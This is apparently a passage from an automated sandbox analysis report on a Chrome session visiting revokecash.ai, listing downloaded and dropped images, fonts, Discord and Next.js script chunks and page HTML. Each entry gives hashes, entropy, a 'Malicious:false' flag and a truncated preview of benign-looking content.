                                                                          Preview:<!DOCTYPE html>.<html lang="en" class="dark" style="--wcm-color-fg-1: rgb(228,231,231); --wcm-color-fg-2: rgb(148,158,158); --wcm-color-fg-3: rgb(110,119,119); --wcm-color-bg-1: rgb(20,20,20); --wcm-color-bg-2: rgb(39,42,42); --wcm-color-bg-3: rgb(59,64,64); --wcm-color-overlay: rgba(255,255,255,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 89; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 400 x 400, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):35580
                                                                          Entropy (8bit):7.950733372004522
                                                                          Encrypted:false
                                                                          SSDEEP:768:5Fe46GUaF+aMBf2+qBA4kbig6C5SRQFATNh0WyqzCZT:16GUcg2BBpk+gqTNiDKCB
                                                                          MD5:19A87FE7056A924B02AAA01797E43D51
                                                                          SHA1:D75B6EDA5DAB517A82E617C86FA87D86AB50DB74
                                                                          SHA-256:0BC240B839BD60D6C8BE47C7E8E060238289D3EAA2C073FEC2813AB579590DA6
                                                                          SHA-512:FF40004D74ADA890F930033503C58C1FE31A26F65972035235B08179ECEF4D26F7B97D8636A934B43F4201D4B7C7CA84122AF1EB85DA133B3FEFB2915C4576EB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR..............a......PLTE.....m..<..E..9..i..C..=..l..O.`...e..s.._..f..d..X..V........G..;..:..7..?..b..@..k..b..>.....Q..S..]..A..j..f..D..8..h..H.~..e...p..[....b......l..p.o...L..n.....4.......z...J.|......`..................o......w..q.........r.......L..6.....^..........t..l.....h....................F..............\.j...N..Y...........................................I.............3..............J......................._...........u......{o..............T....$..............g[......te............}..|.}u......sj.......t.........2k`..\..P.jU.....W..........aT.............SD.q\..o.I;.[L.</....|j..y.....h......e?........o..g..6{S.u`.gM...U...y..r<.../p_5.^.J;.."X5..|9zH....5ZM/.<...M..8......WD...d...-&...L..5.M.......I.>..[........T.._..F.....z....IDATx..{T.U....7..I.J.|.]ost...%M...UTL\xC..A..`..[*.....*d.&2......P0Q._QS.cy.2...[...y....~..|..o...6..<..g.s.v....._...K.../.ic..|.............!X#.k.Qc.^{.-_k..^.F^#kk..l.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 43172, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):43172
                                                                          Entropy (8bit):7.995094617586981
                                                                          Encrypted:true
                                                                          SSDEEP:768:b581idpPK6HJu/D2IsgIM93GOndyGTB/InxZH+6Qh6SjzXBg3yAZkU6Q+YuD:b5ldpPVHWavmMQBcZ+j6NhyUv+Yg
                                                                          MD5:FF6DA0BB5A4EED1D99BD5EB0ED65FC0A
                                                                          SHA1:3AD6D9089274EC0C015AB193C927E2FB04A86549
                                                                          SHA-256:9E39EC7B42B5F6E62F36E4F1EE181796D0663BC05E2FDF12422D6FC8E2765001
                                                                          SHA-512:0C86CB7A0AC6CAE982BCB6BAB7DB9256FFA85C90633E05E5F6904860D3DCDF093A14B0A9A72DB25CF983EB307A3052F90C8704B51273BDD43E9E0B63E68D3845
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://fonts.gstatic.com/s/opensans/v36/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-mu0SC55I.woff2
                                                                          Preview:wOF2...................3..........................O..:..h?HVAR.x.`?STAT.$'...0/V..... .o..2.0..\.6.$..`. ..~...[..q@6...n..8_....9.......(y..L.y..`.*.......P...%.V..d.L....=.I....\.....YU..B..*.....|{.......37B.eI...W{.h=......X..9\.7.P".y+.G.(h....4..Z...#..u>}.o2.b......'...g..W.CG.........?...=..l..k..3^...;..>....Ng...`f.gb./.5<n.$. ....!.@...*TW......~.._...}...w...u5..@.]..RD.v.."4[.....1b. .X..1.nK'1f.v+]...C.......s...\.."..g.......&0W...L..5.....=.......*R..P8r?.......6q.:.B..p.h..M.!!@{5;1c...D..v.!DTI..8..r.r..).c....,sq.!.&8}:q....H........,Y.....E...{..*.ce.B..5A....;.......f.....I...cH.P.X h.L{..o.........#WD.......5D.e..=tJ.J.c.6...f....v...]?Q.~5...wO..B.x..B.(..C....~...(0..A..?.!.!.Dsy.M....~:...<H.......$..(.{....-0.....:....5..C..........J..P..`%:...@.4R..s].Iv..p.u..p..._k.Nh......jS.Z....~...*.e.F.=..R-.......Z.....c.?%....JI...N..pj4H...5@.T.$g.-i.I.5. 9....$'.....v... .?A..$.eH.@9.p..../.!..g.....\.\g.d(....bH/e..&..Zc_.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 1000x1000, components 3
                                                                          Category:dropped
                                                                          Size (bytes):216367
                                                                          Entropy (8bit):7.986086507478987
                                                                          Encrypted:false
                                                                          SSDEEP:6144:aaSAS+Q0YsUECFnaUxabQ2O5qkfJ6o76Me:vSKQvsUECFnaUxaM9gC6Z
                                                                          MD5:C5219F0C35C5996A197B75FD81F18AD0
                                                                          SHA1:3278D4579906B4CA14C51332E59AC943B3C90D42
                                                                          SHA-256:EF319C7DC54DDA2711DE8A6F0E776537C978A6F110A5597FF32C9DEB607534C4
                                                                          SHA-512:DBA2BF2C22C4B13C2931322993A0127BEB99FCF44C5459D2DFF88DD021215ABCEC2BC9EB6FD02EFB4FFF134A5AC07141FAEDB4D89D6512F2315CB1B5003BA2F7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."...............................................................................8r\.\..\.%`d.m.WS...o..qA.P.....t.[.mI..X.}G............(b.!=.wC...G.Jj.....0..<.:..^..n]*.^wb.7..zuI.d].......rJ...=.]K...$...,.....RV..).....d.t...xn.j..a.....2..b...:h.F.mb..^x.+Z..C.M.2W....g..........*...WC.\...o..... \...4..3F........=......kB...X.T...mv.*..}.{.".D..U...^sj.RAv.eg.>;9sq.B.....n?r.H._.>Z>..K.B.*|.r.N>...*j.q$...U.f..{...Wc...SM....).....5IZ e..y.h\.y..9...k!..@.QR..7..e.^e`.63..z..^.~.v....U.NX....d....v...7..nzS.W...I......A......j...Ph......G...IK.....Q.5p(5\....,$.(7...iv.y0...... ..'Ml..........&.|..w.k..6...c.l......K.3E....N..oF...G4.......c<../[<.(.r.a..b#..C..cx..y.\G...n...|..=Aq.]y.....]..2.&....6.C..i. 3.H.@'D .c..X;...N...7...(.~...Z..tr+.A....Pa.#a.5..K]..H..N[w.7....@..e=ty...K......-
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (6688)
                                                                          Category:downloaded
                                                                          Size (bytes):6743
                                                                          Entropy (8bit):5.38238586950171
                                                                          Encrypted:false
                                                                          SSDEEP:96:u5oOAsCGpFtmzVynqivtG1NggnDGEhRoDVJ7b2Wqv30ZO67nj8Hh:u5oMCCFtUxZV3oHK/0Q67AB
                                                                          MD5:5FD723251A1E17D611269F0674084095
                                                                          SHA1:CA252C44AC32B02EAFE62A65A5E0C4F8EDBCB81F
                                                                          SHA-256:D5C3B365AB99628486943A64931B06E1B7278042185E8546E710C445F5676873
                                                                          SHA-512:8222D4AB5F0BBB00ECA9BCD7D0CB3F1B9FFD1E366CBEEEDD0FE4ADB163E5B83DBC42666CCAD9C0A69B88C124D74E1B6828FB84115EA41081CEB8148857AE4D77
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/19263.fe32553ff71153cb7656.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["19263"],{437083:function(t,n,r){var e=r("561449"),u=r("877297");t.exports=function(t){return u(e(t))}},329252:function(t,n,r){var e=r("877297"),u=r("164099");t.exports=function(t){return e(u(t))}},957478:function(t,n,r){var e=r("626785");t.exports=function(t,n){return e(n,function(n){return t[n]})}},561449:function(t,n,r){t.exports=function(t,n){var r=-1,e=t.length;for(n||(n=Array(e));++r<e;)n[r]=t[r];return n}},877297:function(t,n,r){var e=r("68421");t.exports=function(t,n){var r=-1,u=t.length,a=u-1;for(n=void 0===n?u:n;++r<n;){var o=e(r,a),i=t[o];t[o]=t[r],t[r]=i}return t.length=n,t}},375128:function(t,n,r){var e=r("437083"),u=r("329252"),a=r("725502");t.exports=function(t){return(a(t)?e:u)(t)}},164099:function(t,n,r){var e=r("957478"),u=r("466731");t.exports=function(t){return null==t?[]:e(t,u(t))}},188904:function(t,n,r){"use strict";var e={linear:function(t,n,r,e){return(r-n)*t/e+n},easeInQuad:function(t,n,r,e
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):395
                                                                          Entropy (8bit):4.646873794844198
                                                                          Encrypted:false
                                                                          SSDEEP:6:tnrVzUOtumc4slvIl4slvUldboLYPsd9IZI0OuFxMdIr0a/NdpVo4a38n:trVzNtuCHvOdELYPsuI09z9LdYr38n
                                                                          MD5:E843C51C0EEC3801B70CAE5C45AD343F
                                                                          SHA1:AD735360ECFA829DB9D6C48F1A671A99BFCE1D2A
                                                                          SHA-256:F860149A77A53D43396F3AEC9377B9A0DD6C5D84459079C5D393F6343EC253FB
                                                                          SHA-512:2AF4816580FD02A2AE107914D967AF966CA97E137434E2668C7A430D34168E150F668AE3A3B005BFF7070D50A0FD89BD0B5A351F5E3DB6F6B167998378308F71
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.31127 9.31127 12 5.99456 12C2.80018 12 0.188323 9.50595 0 6.35889C0.795708 7.06704 1.84421 7.49727 2.9932 7.49727Z" fill="#FFFFFF"/>.</svg>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 39724, version 2.66
                                                                          Category:downloaded
                                                                          Size (bytes):39724
                                                                          Entropy (8bit):7.994965715436545
                                                                          Encrypted:true
                                                                          SSDEEP:768:w35mZVsqT7RAo+6tbgLdolT9YSswcTWa+O/dm8ae41u37qt+:1xTO3kb0dolT998WhO/Hae4jt+
                                                                          MD5:FF5ECCDE83F118CEA0224EBBB9DC3179
                                                                          SHA1:0AD305614C46BDB6B7BB3445C2430E12AECEE879
                                                                          SHA-256:13DA02CE62B1A388A7C8D6F3BD286FE774EE2B91AC63D281523E80B2A8A063BC
                                                                          SHA-512:03DC88F429DD72D9433605C7C0F5659AD8D72F222DA0BB6BF03B46F4A509B17EC2181AF5DB180C2F6D11C02F39A871C651BE82E28FB5859037E1BBF6A7A20F6B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/3f46bbecb4287c0a829f.woff2
                                                                          Preview:wOF2.......,......|P.......B............................. .`..P..@..W........<.6.$..`..r.. ..<..F..`[pVq..w.SI..+.S.f;dS.i.. C.bj.6..w;./......OM&..[.mo-......4F`...SeR.XzP.g..j..L.....S.T(a..y.D...od./).....|l...zn...T..OpZP....c\....%.H..y..g.!..!..|._........O._.[.nJS..]..H....rd..#.?.n#.B.w.w...":.u...|.a..#.#N...q.z.Z.....".5...X...3|O...8>......(...H....M|.w.o.%.%..|5.'L.a.N.) ..G`.(1.je.#.~_.......!...7.e.......s.\.`G.^...h.B....tR.N..+"xU....3.F}0....z...@^..iB^....u&....._{.$]..........8k....?.c...^.~...A2...T.$.i.....Ycx!b~.x...3:g.[.!.X...fgt.duf.....uZW!....y..(].$.If_....g69.Ef.'{.ndC..Yt6..*.;..\..M......E'.^I....rFJ..)1|...q......!.m~......../M.........7!I.E...U..!"....:...T9{!=.+... ..es2.2.%.Ll.t.j.D .p..<...$.....%...IB"'..#H.D............;OWk..G.Y.V....\&.U{.V....N.h....S[Yg(......f..Uu......z2.(.r..3...,-...G....c.9^"..:..>.......Q....S......]D'.,.@4..w./S.ep`...].sGR....Vc.j...-.|..}_...*&.eg.G..e.u...(./S..+H.'.9\.k%..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):142
                                                                          Entropy (8bit):5.162646792837315
                                                                          Encrypted:false
                                                                          SSDEEP:3:XzOYNRfdHhOYNRfcZqVRNqXREeScWlfDUYfaRMYfLcZKGMYfOfUGRMYf2:XzjbdHhjbzrqBiFAIaqILcZKbIOUGqI2
                                                                          MD5:70328C2516F0DBF0A3237195B977BA00
                                                                          SHA1:37E8EE4CF7C961910DC4C7368FF90C918DFAF57D
                                                                          SHA-256:B06E3C7B255F03AE1C90999BA4EECBE0C1321315F26E71A7209A4015C06C168B
                                                                          SHA-512:8F0F6305BD177ECD3710346913F9B1B6E8FB223CEC900F78AFFC2FF82167E349AFC0AB05C8EC215B2B50C53C9A71D0471461DC01C10D83F1293504FA62DFA296
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/924.bd5f832b6d1a0e30.js
                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[924],{79391:function(){},57002:function(){},87942:function(){},82880:function(){}}]);
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4463)
                                                                          Category:downloaded
                                                                          Size (bytes):39604
                                                                          Entropy (8bit):5.128924961514765
                                                                          Encrypted:false
                                                                          SSDEEP:768:h8K1PC/TfCwNFrT3Mi08xvEk2o8Pf1PPaooIQRBTs/YQG1TXX2sFSkc2bPgB6vEl:6bMi0ssk2oqlCZHnmIDHW
                                                                          MD5:FFBEC580004B62F1267F5236B27DF979
                                                                          SHA1:9A1EC826A85A907B9CAA5156FB619FEADC410A38
                                                                          SHA-256:CAA279675BDAD4BEF452B9F9D0B085645F8F1B0156C896B1F664563E0E13DBB1
                                                                          SHA-512:E0BFEC45055291AC63A08B5C79DF6D74A57A408580C8746B45FFAF108203ACAC1F8A93792067628488AD0FDB5B8FDE4BD67D5E244F520C7B63FB6BD91AF56DC9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/
                                                                          Preview:<!DOCTYPE html>.<html lang="en" class="dark" style="--wcm-color-fg-1: rgb(228,231,231); --wcm-color-fg-2: rgb(148,158,158); --wcm-color-fg-3: rgb(110,119,119); --wcm-color-bg-1: rgb(20,20,20); --wcm-color-bg-2: rgb(39,42,42); --wcm-color-bg-3: rgb(59,64,64); --wcm-color-overlay: rgba(255,255,255,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 89; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (2138)
                                                                          Category:downloaded
                                                                          Size (bytes):2187
                                                                          Entropy (8bit):5.2745224615614115
                                                                          Encrypted:false
                                                                          SSDEEP:48:9kTC+SlsHWv0olj/C8ElBHlBjlHY6IWEl6q:I2v0Wj61BFBJHY6Idl6q
                                                                          MD5:22E992F0628B3D94AE2C99AD0E437656
                                                                          SHA1:F18568913ACB85BC2C740E9D619D2BA7F5765D78
                                                                          SHA-256:4364F4990ADFDFAE452760D6ADC89DE0CA942751ED196160C1196C9602145169
                                                                          SHA-512:36D4F022FD249EE03B389928D9DD2BD204B2958AC2C13952D127D40B9B72242CCC2B6284305D9F4DC11733A24820EF9AADFB42D4FEF2C6846F75CFCE61C9D42F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/8e64227ebe6f34850334.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["39500"],{573055:function(e,t,n){"use strict";n.r(t),n.d(t,{getSelectionText:function(){return r},contextMenuCallbackNative:function(){return i},contextMenuCallbackWeb:function(){return o}});var l=n("37983");n("884691");var u=n("272030");function r(){let e;if(null!=window.getSelection){var t;e=null===(t=window.getSelection())||void 0===t?void 0:t.toString()}else null!=document.selection&&"Control"!==document.selection.type&&(e=document.selection.createRange().text);return null!=e?e:""}function i(e){let t=r(),i=e.target;if((null==i?void 0:i.tagName)==="TEXTAREA"||(null==i?void 0:i.tagName)==="INPUT"){if((null==i?void 0:i.type)!=="checkbox")return(0,u.openContextMenuLazy)(e,async()=>{let{default:e}=await n.el("188503").then(n.bind(n,"188503"));return n=>(0,l.jsx)(e,{...n,text:t})},{enableSpellCheck:!0})}else if("none"===window.getComputedStyle(i).getPropertyValue("-webkit-user-select")){e.preventDefault();return}else{
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (9316)
                                                                          Category:downloaded
                                                                          Size (bytes):9371
                                                                          Entropy (8bit):5.389737930634416
                                                                          Encrypted:false
                                                                          SSDEEP:192:T5LFX4cnwaQD1t1w/Kk93T28ROaGERRteifBU9RWdFJk3dAlF2:T7XHnw/t1w/Kk5a8ROaHRRtxlfu3X
                                                                          MD5:7604B5A900F3A6037A6B372929243915
                                                                          SHA1:0CF8B92E08D6FA7C56B3BE292E4591A141C8D474
                                                                          SHA-256:8D5E4C8BE01C4A977240EF461A01416A0BC1F0F4B100226FE1DB872102674787
                                                                          SHA-512:80FA0B84BB961759B29C00FDCC5C00B10010E54B5C38EE1D3580077AB2CED55DF805FF0B5E160C4D468E5464C4EFD54DC700AFF41B8EF445890FE50DCCF44E3C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/26737.36ed5a81390b304d18a5.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["26737"],{404607:function(e,t,s){"use strict";s.r(t),s.d(t,{default:function(){return I}});var i=s("872717"),n=s("913144"),a=s("404118"),d=s("263024"),l=s("938237"),u=s("395118"),r=s("250850"),h=s("867965"),o=s("49111"),c=s("782340");async function m(e,t,s){try{return await e()}catch(e){var i;(null===(i=e.body)||void 0===i?void 0:i.code)===o.AbortCodes.NON_MODERATED_TAG_REQUIRED&&a.default.show({title:t,body:s})}}var I={resort(e){n.default.dispatch({type:"RESORT_THREADS",channelId:e})},createForumTag:(e,t)=>i.default.post({url:o.Endpoints.FORUM_TAGS(t),body:{name:e.name,emoji_id:e.emojiId,emoji_name:null!=e.emojiId?void 0:e.emojiName,moderated:e.moderated}}),updateForumTag(e,t){let s=i.default.put({url:o.Endpoints.FORUM_TAG(t,e.id),body:{name:e.name,emoji_id:e.emojiId,emoji_name:null==e.emojiId?e.emojiName:void 0,moderated:e.moderated}});m(()=>s,c.default.Messages.FORUM_TAG_EDIT_ERROR,c.default.Messages.FORUM_POST_N
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 48x48, components 3
                                                                          Category:dropped
                                                                          Size (bytes):1222
                                                                          Entropy (8bit):6.805871143233324
                                                                          Encrypted:false
                                                                          SSDEEP:24:V9YMWqRjmZbcAjyzmnAz1DHoA721wvqsW2abIfg2X4laz6LXTtZkvdKNk:V9YM3W4AWzmAZDHTAsW23h4la/vcW
                                                                          MD5:47756FB34C53E9EE00833D8E5B3DCED0
                                                                          SHA1:F75330384CCB7CEE519B13BD11E36C2F1739A2BA
                                                                          SHA-256:8FABED570D58359D56BAC0AE085B7D320C35C674F19E7BE041C770E8740D14D1
                                                                          SHA-512:E4388058B535D0EA7A6DB9A6BB80A0232F04F738F748D093409D77074CA97C184732771E606B286CC98DB893F7C55D7C8819214BC92C9CAB62AD67DBBE7C369E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......0.0.."...........................................................................o..i..F...f.vt)..9.R..g..!..GU....?...!.........................!."#1C...........w..[..JM"..E...(.x."...D...*.WF.....]:......)..NrP@....?>-{....G..x.R..>]...W._.............................!1A........?.T....^]..e.$"...............................!1a........?..-Zv.R..>...]U.......)......................!..AQ1BRa.."2bqr.........?.....d.I.d.M.XM.L.>.9\9.A.=..,.!@m._...-........Vqq..P.l).a<.Q*.... \d.....5...O..... ....................!1AaQq............?!.Y$....'.:Z..y<..]..1.y......a.$.*|..-.<..TU..fQ]..%.|.u..P......{..L/.....d#....Z.O.C..U.NZ.....w.7t1...,...vjc./..e...,.................2K....?........................!1Q........?.i.N.......a.K............................!1.........?.]..'s..!..>.1.|.e....."....................!1aAQq.....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (11917)
                                                                          Category:downloaded
                                                                          Size (bytes):11972
                                                                          Entropy (8bit):5.335388611561005
                                                                          Encrypted:false
                                                                          SSDEEP:192:/1AHE88Ucm3wDWJp5QB/PqOEx4sjgu1weJppw:di8t3Yp5U6bnpw
                                                                          MD5:BF9CEC44DF97CE70C5C7662775D9E78E
                                                                          SHA1:70A336A3B2A90B7E140634426EE705D643CDB2D6
                                                                          SHA-256:1AC7A6E1243FA26932CD48F1892F8C79C6F018A104F0373E94C3001088544921
                                                                          SHA-512:E03E9725AC461D4885CDD160848B0EA414B5A8F4735058A43C1F203E0515E8D977CA8EFCEF5BB9566255A157964C82CA1DC6E15581B7AECBFB2CF2329E6EB271
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/26230.a8a95f983d9bf704aebc.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["26230"],{309570:function(t,e,n){"use strict";n.r(e),n.d(e,{default:function(){return u}});var l=n("49111");function u(t){return null!=t&&t.type!==l.ActivityTypes.CUSTOM_STATUS&&(null!=t.details||null!=t.assets&&(null!=t.assets.large_image||null!=t.assets.small_text)||null!=t.party||null!=t.secrets||null!=t.state)}},716241:function(t,e,n){"use strict";n.r(e),n.d(e,{collectGuildAnalyticsMetadata:function(){return C},collectChannelAnalyticsMetadataFromId:function(){return O},collectChannelAnalyticsMetadata:function(){return L},collectVoiceAnalyticsMetadata:function(){return M},trackWithMetadata:function(){return U},getVoiceStateMetadata:function(){return D},getCustomStatusMetadata:function(){return P},default:function(){return G}});var l=n("917351"),u=n.n(l),i=n("316693"),a=n("233069"),s=n("271938"),r=n("42203"),d=n("923959"),c=n("525065"),o=n("26989"),f=n("305961"),_=n("42887"),g=n("957255"),S=n("824563"),E=n("945956
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):22914
                                                                          Entropy (8bit):7.985262455728628
                                                                          Encrypted:false
                                                                          SSDEEP:384:rK173VVQaaTb71GUieBKcJtp9XspGVwpcr3mLChsP48cy31+wMXSxHU35r/EC5En:EFVXQ0UieBKcApGWcr3mLC2YBXKHU35m
                                                                          MD5:FEB8F822D0CA9C55429CADF89058D519
                                                                          SHA1:BBF79A580AE2540C1EF4D50DA5927F697052491C
                                                                          SHA-256:05DD1667EA9CBBC0AF59DA4F1A62B38170DBE4CFDE9C175E2C3078C19F714BBA
                                                                          SHA-512:FE059545F24BC6FCEAF98D8C95C12E3DE1872F2FC02CF10A75A608840E17FAA2E3C392AF1E6EBC70AC1B87F869C995351E4E785E617FDC7A43EECE3CA196F471
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...\......QA@..A.ADB....))E......T.P$.Z..]..U.[r..9....fpt..........uv....}.........Vw.;...C.n?.....m._......T..>o^.../..4/./v..?.v....N.>2..y...F.b\..`l......mW+*..e....,...B.(y...A._\.i^..YB..=.ve...+.m.........o.WT..+*.HeE.....|.*..k ...B..>.v.m..v.[O7.C...J.....m^......,...O..2.gC.Q...y5_....tBd.Yc...Y..`...k m-.5......f......5@..c..A..fS..[...im......c.$&.9Xh....hR..k....A3p.jV..y...k.....f.*...Y..P...f..P...f..P...f..P...f..P...f..+..M._..'/^...|.K..}..]...f..c.(L....Ue!.V.B}.^x.v. t......k.4P6...PI.D.(....Y9*..<...n..E~...x..S.g...{..^W........._.E>.R!~..:.(.T..|........K.0.\...T....j....0......(K}.<..a>.!.o+..Q<....w...=..~......T....^W....2.....U%T._U.B.|(....F..3p_..M...`..PSU..j...Tt..v...K..wO.n^?.f...Vj.+'...M.....:Bj+..US.N.5cO.4f..4fO.2aO.1e.u.d...g..t.Y4b`...u..Ob..Y.=uu-.Qe......W...*..y.V.o.N3p.-.P......v/..)#w....].Y??.ni.gM..5;G[.vO..._:.....CE-(.5.....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):22914
                                                                          Entropy (8bit):7.985262455728628
                                                                          Encrypted:false
                                                                          SSDEEP:384:rK173VVQaaTb71GUieBKcJtp9XspGVwpcr3mLChsP48cy31+wMXSxHU35r/EC5En:EFVXQ0UieBKcApGWcr3mLC2YBXKHU35m
                                                                          MD5:FEB8F822D0CA9C55429CADF89058D519
                                                                          SHA1:BBF79A580AE2540C1EF4D50DA5927F697052491C
                                                                          SHA-256:05DD1667EA9CBBC0AF59DA4F1A62B38170DBE4CFDE9C175E2C3078C19F714BBA
                                                                          SHA-512:FE059545F24BC6FCEAF98D8C95C12E3DE1872F2FC02CF10A75A608840E17FAA2E3C392AF1E6EBC70AC1B87F869C995351E4E785E617FDC7A43EECE3CA196F471
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...\......QA@..A.ADB....))E......T.P$.Z..]..U.[r..9....fpt..........uv....}.........Vw.;...C.n?.....m._......T..>o^.../..4/./v..?.v....N.>2..y...F.b\..`l......mW+*..e....,...B.(y...A._\.i^..YB..=.ve...+.m.........o.WT..+*.HeE.....|.*..k ...B..>.v.m..v.[O7.C...J.....m^......,...O..2.gC.Q...y5_....tBd.Yc...Y..`...k m-.5......f......5@..c..A..fS..[...im......c.$&.9Xh....hR..k....A3p.jV..y...k.....f.*...Y..P...f..P...f..P...f..P...f..P...f..+..M._..'/^...|.K..}..]...f..c.(L....Ue!.V.B}.^x.v. t......k.4P6...PI.D.(....Y9*..<...n..E~...x..S.g...{..^W........._.E>.R!~..:.(.T..|........K.0.\...T....j....0......(K}.<..a>.!.o+..Q<....w...=..~......T....^W....2.....U%T._U.B.|(....F..3p_..M...`..PSU..j...Tt..v...K..wO.n^?.f...Vj.+'...M.....:Bj+..US.N.5cO.4f..4fO.2aO.1e.u.d...g..t.Y4b`...u..Ob..Y.=uu-.Qe......W...*..y.V.o.N3p.-.P......v/..)#w....].Y??.ni.gM..5;G[.vO..._:.....CE-(.5.....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):137
                                                                          Entropy (8bit):4.832107377824175
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WH7W+lFAATcvcmJDmJS4RKb5KVErcHrFvR8hiJqGrqL0:t6Abli/c8mc4slmrFv2hiAe
                                                                          MD5:70275FE3104CF1D3388586AD8FFD478E
                                                                          SHA1:473EA46F5B22B5C7D14C39EE9C0C82811593883B
                                                                          SHA-256:3269CF3FDA7681388472225BAD39B6BB3B26088A0A03B6CD5796195F0114CE13
                                                                          SHA-512:044C0F8F1583FAEBA3A23FF2DF821A5A0E79C548DB3A6474614894DA2CB125476227407F865CF20D32DC7E4D9ADE09EBA6317EFB787EEED2570C0EBDFC401D2A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg fill="none" height="8" viewBox="0 0 9 8" width="9" xmlns="http://www.w3.org/2000/svg"><path d="m4.5 0 4.5 8h-9z" fill="#fff"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
